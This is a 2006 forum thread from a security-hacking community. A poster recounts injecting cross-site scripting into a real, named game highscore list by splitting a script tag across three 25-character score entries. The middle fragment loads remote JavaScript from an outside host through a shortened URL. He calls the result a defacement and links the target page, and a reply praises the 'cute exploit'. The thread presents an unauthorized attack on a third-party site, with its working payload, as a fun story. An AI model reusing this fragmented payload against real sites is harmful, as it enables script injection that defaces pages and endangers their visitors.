Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
I <3 XSS Fragmentation
Posted by: Spikeman
Date: October 23, 2006 04:14AM

I used it to get around size constraints on a page. The page is a highscore list for a flash game, I got the URL to submit scores through by decompiling the swf. Since I could inject highscores onto the list I thought it would be an easy xss. Turns out that the server limited the input to 25 characters. And single quotes broke it. Here's how I finally got it to work:

Three different scores,
1) <script xss=\'
2) '\src=http://durl.us/1db>
3) </script>

2 is a tinyurl like-site to http://ha.ckers.org/s.js (stallowned).

So yeah, that's my fun story of the day. Just wondering, how could I fix the defacement?

Here's the site: http://www.thorgaming.com/highscores/index.php?game=17&diff=1&order=top

Options: ReplyQuote
Re: I <3 XSS Fragmentation
Posted by: rsnake
Date: October 23, 2006 11:27AM

Cute exploit! I guess fragmentation is more common that I had previously though. I hadn't encountered many of these before.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.